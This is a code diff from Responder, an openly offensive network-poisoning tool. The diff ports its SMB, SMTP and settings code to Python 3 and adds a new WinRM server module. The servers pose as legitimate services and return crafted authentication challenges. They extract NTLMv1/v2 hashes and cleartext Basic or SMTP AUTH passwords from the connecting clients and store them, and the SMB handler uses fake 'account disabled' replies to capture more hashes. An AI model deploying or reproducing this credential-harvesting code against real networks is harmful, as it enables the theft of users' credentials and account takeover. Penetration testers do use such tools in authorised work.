+				if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(b'SMB 2.\?\?\?', data) == None:
+					Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
+					Body.calculate()
+		
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
+
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+					data = self.request.recv(1024)
+
+				if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # Session Setup AndX Request smbv1
 					IsNT4ClearTxt(data, self.client_address[0])
 					
 					# STATUS_MORE_PROCESSING_REQUIRED
-					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
+					Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge, NTLMSSPNTLMChallengeAVPairsUnicodeStr="NOMATCH")
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					else:
-						Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
+						Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 					Body.calculate()
 		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)

-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)


-					if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # STATUS_SUCCESS
+					if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff":  # STATUS_SUCCESS
 						if Is_Anonymous(data):
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 							Body = SMBSessEmpty()

-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)

-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))

 						else:
 							# Parse NTLMSSP_AUTH packet
-							ParseSMBHash(data,self.client_address[0])
+							ParseSMBHash(data,self.client_address[0], Challenge)

 							if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
 								# Send ACCOUNT_DISABLED to get multiple hashes if there are any
-								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
 								Body = SMBSessEmpty()

-								Packet = str(Header)+str(Body)
-								Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+								packet1 = str(Header)+str(Body)
+								Buffer = StructPython2or3('>i', str(packet1))+str(packet1)

-								self.request.send(Buffer)
+								self.request.send(NetworkSendBufferPython2or3(Buffer))
 								self.ntry += 1
 								continue

 							# Send STATUS_SUCCESS
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 							Body = SMBSession2Accept()
 							Body.calculate()

-							Packet = str(Header)+str(Body)
-							Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+							packet1 = str(Header)+str(Body)
+							Buffer = StructPython2or3('>i', str(packet1))+str(packet1)

-							self.request.send(Buffer)
+							self.request.send(NetworkSendBufferPython2or3(Buffer))
 							data = self.request.recv(1024)
 				

-				if data[8:10] == "\x75\x00" and data[4:5] == "\xff":  # Tree Connect AndX Request
+				if data[8:10] == b"\x75\x00" and data[4:5] == b"\xff":  # Tree Connect AndX Request
 					ParseShare(data)
-					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
+					Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(NetworkRecvBufferPython2or3(data)), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Body = SMBTreeData()
 					Body.calculate()

-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+					packet1 = str(Header)+str(Body)
+					Buffer = StructPython2or3('>i', str(packet1))+str(packet1)

-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
-
-				if data[8:10] == "\x71\x00" and data[4:5] == "\xff":  #Tree Disconnect
-					Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-				if data[8:10] == "\xa2\x00" and data[4:5] == "\xff":  #NT_CREATE Access Denied.
-					Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-				if data[8:10] == "\x25\x00" and data[4:5] == "\xff":  # Trans2 Access Denied.
-					Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-				
-
-				if data[8:10] == "\x74\x00" and data[4:5] == "\xff":  # LogOff
-					Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
-					Body = "\x02\xff\x00\x27\x00\x00\x00"
-
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
-					data = self.request.recv(1024)
-
-		except socket.error:
+		except:
 			pass


 class SMB1LM(BaseRequestHandler):  # SMB Server class, old version
 	def handle(self):
 		try:
-			self.request.settimeout(0.5)
+			self.request.settimeout(1)
 			data = self.request.recv(1024)
-
-			if data[0] == "\x81":  #session request 139
+			Challenge = RandomChallenge()
+			if data[0] == b"\x81":  #session request 139
 				Buffer = "\x82\x00\x00\x00"
-				self.request.send(Buffer)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)

-			if data[8:10] == "\x72\x00":  #Negotiate proto answer.
-				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
-				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
+			if data[8:10] == b"\x72\x00":  #Negotiate proto answer.
+				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
+				Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)),Domain="",Key=NetworkRecvBufferPython2or3(Challenge))
 				Body.calculate()
 				Packet = str(head)+str(Body)
-				Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-				self.request.send(Buffer)
+				Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+				self.request.send(NetworkSendBufferPython2or3(Buffer))
 				data = self.request.recv(1024)

-			if data[8:10] == "\x73\x00":  #Session Setup AndX Request
+			if data[8:10] == b"\x73\x00":  #Session Setup AndX Request
 				if Is_LMNT_Anonymous(data):
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head)+str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 				else:
-					ParseLMNTHash(data,self.client_address[0])
-					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					ParseLMNTHash(data,self.client_address[0], Challenge)
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
 					Packet = str(head) + str(SMBSessEmpty())
-					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
-					self.request.send(Buffer)
+					Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 		except Exception:
 			self.request.close()
--- a/servers/SMTP.py
+++ b/servers/SMTP.py
@@ -16,38 +16,29 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
 from base64 import b64decode
-from SocketServer import BaseRequestHandler
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2

 class ESMTP(BaseRequestHandler):

 	def handle(self):
 		try:
-			self.request.send(str(SMTPGreeting()))
+			self.request.send(NetworkSendBufferPython2or3(SMTPGreeting()))
 			data = self.request.recv(1024)

-			if data[0:4] == "EHLO":
-				self.request.send(str(SMTPAUTH()))
+			if data[0:4] == b'EHLO' or data[0:4] == b'ehlo':
+				self.request.send(NetworkSendBufferPython2or3(SMTPAUTH()))
 				data = self.request.recv(1024)

-			if data[0:4] == "AUTH":
-				self.request.send(str(SMTPAUTH1()))
-				data = self.request.recv(1024)
-				
-				if data:
-					try:
-						User = filter(None, b64decode(data).split('\x00'))
-						Username = User[0]
-						Password = User[1]
-					except:
-						Username = b64decode(data)
-
-						self.request.send(str(SMTPAUTH2()))
-						data = self.request.recv(1024)
-
-						if data:
-							try: Password = b64decode(data)
-							except: Password = data
+			if data[0:4] == b'AUTH':
+				AuthPlain = re.findall(b'(?<=AUTH PLAIN )[^\r]*', data)
+				if AuthPlain:
+					User = list(filter(None, b64decode(AuthPlain[0]).split(b'\x00')))
+					Username = User[0].decode('latin-1')
+					Password = User[1].decode('latin-1')

 					SaveToDb({
 						'module': 'SMTP', 
@@ -56,7 +47,35 @@ class ESMTP(BaseRequestHandler):
 						'user': Username, 
 						'cleartext': Password, 
 						'fullhash': Username+":"+Password,
-					})
+						})
+
+				else:
+					self.request.send(NetworkSendBufferPython2or3(SMTPAUTH1()))
+					data = self.request.recv(1024)
+				
+					if data:
+						try:
+							User = list(filter(None, b64decode(data).split(b'\x00')))
+							Username = User[0].decode('latin-1')
+							Password = User[1].decode('latin-1')
+						except:
+							Username = b64decode(data).decode('latin-1')
+
+							self.request.send(NetworkSendBufferPython2or3(SMTPAUTH2()))
+							data = self.request.recv(1024)
+
+							if data:
+								try: Password = b64decode(data)
+								except: Password = data
+
+						SaveToDb({
+							'module': 'SMTP', 
+							'type': 'Cleartext', 
+							'client': self.client_address[0], 
+							'user': Username, 
+							'cleartext': Password, 
+							'fullhash': Username+":"+Password,
+						})

 		except Exception:
 			pass
--- a/servers/WinRM.py
+++ b/servers/WinRM.py
@@ -0,0 +1,180 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
+from packets import NTLM_Challenge
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer, WinRM_NTLM_Challenge_Ans
+from packets import WPADScript, ServeExeFile, ServeHtmlFile
+
+
+# Parse NTLMv1/v2 hash.
+def ParseHTTPHash(data, Challenge, client, module):
+	LMhashLen    = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	
+	NthashLen    = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
+	UserLen      = struct.unpack('<H',data[36:38])[0]
+	UserOffset   = struct.unpack('<H',data[40:42])[0]
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
+	if NthashLen == 24:
+		HostNameLen     = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv1', 
+			'client': client, 
+			'host': HostName, 
+			'user': User, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 24:
+		NthashLen      = 64
+		DomainLen      = struct.unpack('<H',data[28:30])[0]
+		DomainOffset   = struct.unpack('<H',data[32:34])[0]
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
+		HostNameLen    = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
+		SaveToDb({
+			'module': module, 
+			'type': 'NTLMv2', 
+			'client': client, 
+			'host': HostName, 
+			'user': Domain + '\\' + User,
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
+			'fullhash': WriteHash,
+		})
+
+# Handle HTTP packet sequence.
+def PacketSequence(data, client, Challenge):
+	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
+	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
+
+	if NTLM_Auth or NTLM_Auth2:
+		if NTLM_Auth2:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if NTLM_Auth:
+			Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
+
+		if Packet_NTLM == b'\x01':
+			Buffer = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			if NTLM_Auth2:
+				Buffer_Ans = WinRM_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+			else:
+				Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+				return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			if NTLM_Auth2:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			else:
+				NTLM_Auth = b64decode(''.join(NTLM_Auth))
+
+			ParseHTTPHash(NTLM_Auth, Challenge, client, "WinRM")
+			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+			Buffer.calculate()
+			return Buffer
+
+	elif Basic_Auth:
+		ClearText_Auth = b64decode(''.join(Basic_Auth))
+
+		SaveToDb({
+			'module': 'WinRM', 
+			'type': 'Basic', 
+			'client': client, 
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
+			})
+
+		Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+		Buffer.calculate()
+		return Buffer
+	else:
+		if settings.Config.Basic:
+			Response = IIS_Basic_401_Ans()
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending BASIC authentication request to %s" % client))
+
+		else:
+			Response = IIS_Auth_401_Ans()
+			if settings.Config.Verbose:
+				print(text("[WinRM] Sending NTLM authentication request to %s" % client))
+
+		return Response
+
+# HTTP Server class
+class WinRM(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+		
+		except:
+			raise
+			pass
+			
--- a/settings.py
+++ b/settings.py
@@ -14,13 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import utils
-import ConfigParser
+import utils, sys, random
+if (sys.version_info > (3, 0)):
+	import configparser as ConfigParser
+else:
+	import ConfigParser
 import subprocess

 from utils import *

-__version__ = 'Responder 2.3.2'
+__version__ = 'Responder 3.0.7.0'

 class Settings:
 	
@@ -65,10 +68,18 @@ class Settings:

 	def populate(self, options):

-		if options.Interface is None and utils.IsOsX() is False:
-			print utils.color("Error: -I <if> mandatory option is missing", 1)
+		if options.Interface == None and utils.IsOsX() == False:
+			print(utils.color("Error: -I <if> mandatory option is missing", 1))
 			sys.exit(-1)

+		if options.Interface == "ALL" and options.OURIP == None:
+			print(utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1))
+			sys.exit(-1)
+		#Python version
+		if (sys.version_info > (3, 0)):
+			self.PY2OR3     = "PY3"
+		else:
+			self.PY2OR3	= "PY2"
 		# Config parsing
 		config = ConfigParser.ConfigParser()
 		config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
@@ -84,6 +95,9 @@ class Settings:
 		self.SMTP_On_Off     = self.toBool(config.get('Responder Core', 'SMTP'))
 		self.LDAP_On_Off     = self.toBool(config.get('Responder Core', 'LDAP'))
 		self.DNS_On_Off      = self.toBool(config.get('Responder Core', 'DNS'))
+		self.RDP_On_Off      = self.toBool(config.get('Responder Core', 'RDP'))
+		self.DCERPC_On_Off      = self.toBool(config.get('Responder Core', 'DCERPC'))
+		self.WinRM_On_Off      = self.toBool(config.get('Responder Core', 'WINRM'))
 		self.Krb_On_Off      = self.toBool(config.get('Responder Core', 'Kerberos'))

 		# Db File
@@ -130,32 +144,43 @@ class Settings:
 		self.WPAD_Script      = config.get('HTTP Server', 'WPADScript')
 		self.HtmlToInject     = config.get('HTTP Server', 'HtmlToInject')

-		if not os.path.exists(self.Html_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
+		if self.Serve_Exe == True:	
+			if not os.path.exists(self.Html_Filename):
+				print(utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1))

-		if not os.path.exists(self.Exe_Filename):
-			print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)
+			if not os.path.exists(self.Exe_Filename):
+				print(utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1))

 		# SSL Options
 		self.SSLKey  = config.get('HTTPS Server', 'SSLKey')
 		self.SSLCert = config.get('HTTPS Server', 'SSLCert')

 		# Respond to hosts
-		self.RespondTo         = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
-		self.RespondToName     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])
-		self.DontRespondTo     = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
-		self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
+		self.RespondTo         = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
+		self.RespondToName     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
+		self.DontRespondTo     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
+		self.DontRespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))

+		#Generate Random stuff for one Responder session
+		self.MachineName       = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
+		self.Domain            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
+		self.DHCPHostname      = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)])
+		self.DomainName        = self.Domain + '.LOCAL'
+		self.MachineNego       = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
+		self.RPCPort           = random.randrange(45000, 49999)
 		# Auto Ignore List
-		self.AutoIgnore                 = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
-		self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
-		self.AutoIgnoreList             = []
+		self.AutoIgnore                       = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
+		self.CaptureMultipleCredentials       = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
+		self.CaptureMultipleHashFromSameHost  = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost'))
+		self.AutoIgnoreList                   = []

 		# CLI options
+		self.ExternalIP         = options.ExternalIP
 		self.LM_On_Off          = options.LM_On_Off
+		self.NOESS_On_Off       = options.NOESS_On_Off
 		self.WPAD_On_Off        = options.WPAD_On_Off
 		self.Wredirect          = options.Wredirect
-		self.NBTNSDomain        = options.NBTNSDomain
+		self.DHCP_On_Off        = options.DHCP_On_Off
 		self.Basic              = options.Basic
 		self.Finger_On_Off      = options.Finger
 		self.Interface          = options.Interface
@@ -167,54 +192,93 @@ class Settings:
 		self.ProxyAuth_On_Off   = options.ProxyAuth_On_Off
 		self.CommandLine        = str(sys.argv)

-		if self.HtmlToInject is None:
+		if self.ExternalIP:
+			self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
+
+		if self.HtmlToInject == None:
 			self.HtmlToInject = ''

-		self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
+		self.Bind_To         = utils.FindLocalIP(self.Interface, self.OURIP)
+
+		if self.Interface == "ALL":
+                	self.Bind_To_ALL  = True
+		else:
+			self.Bind_To_ALL  = False
+
+		if self.Interface == "ALL":
+			self.IP_aton   = socket.inet_aton(self.OURIP)
+		else:
+			self.IP_aton   = socket.inet_aton(self.Bind_To)

-		self.IP_aton         = socket.inet_aton(self.Bind_To)
 		self.Os_version      = sys.platform

 		# Set up Challenge
 		self.NumChal = config.get('Responder Core', 'Challenge')
+		if self.NumChal.lower() == 'random':
+			self.NumChal = "random"

-		if len(self.NumChal) is not 16:
-			print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
+		if len(self.NumChal) != 16 and self.NumChal != "random":
+			print(utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1))
 			sys.exit(-1)

-		self.Challenge = ""
-		for i in range(0, len(self.NumChal),2):
-			self.Challenge += self.NumChal[i:i+2].decode("hex")
+		self.Challenge = b''
+		if self.NumChal.lower() == 'random':
+			pass
+		else:
+			if self.PY2OR3 == 'PY2':
+				for i in range(0, len(self.NumChal),2):
+					self.Challenge += self.NumChal[i:i+2].decode("hex")
+			else:
+					self.Challenge = bytes.fromhex(self.NumChal)
+

 		# Set up logging
 		logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
 		logging.warning('Responder Started: %s' % self.CommandLine)

 		Formatter = logging.Formatter('%(asctime)s - %(message)s')
-                CLog_Handler = logging.FileHandler(self.ResponderConfigDump, 'a')
 		PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
 		ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
-                CLog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setLevel(logging.INFO)
 		ALog_Handler.setLevel(logging.INFO)
 		PLog_Handler.setFormatter(Formatter)
 		ALog_Handler.setFormatter(Formatter)

-		self.ResponderConfigLogger = logging.getLogger('Config Dump Log')
-		self.ResponderConfigLogger.addHandler(CLog_Handler)
-
 		self.PoisonersLogger = logging.getLogger('Poisoners Log')
 		self.PoisonersLogger.addHandler(PLog_Handler)

 		self.AnalyzeLogger = logging.getLogger('Analyze Log')
 		self.AnalyzeLogger.addHandler(ALog_Handler)
                
-                NetworkCard = subprocess.check_output(["ifconfig", "-a"])
-                DNS = subprocess.check_output(["cat", "/etc/resolv.conf"])
-                RoutingInfo = subprocess.check_output(["netstat", "-rn"])
-                Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo)
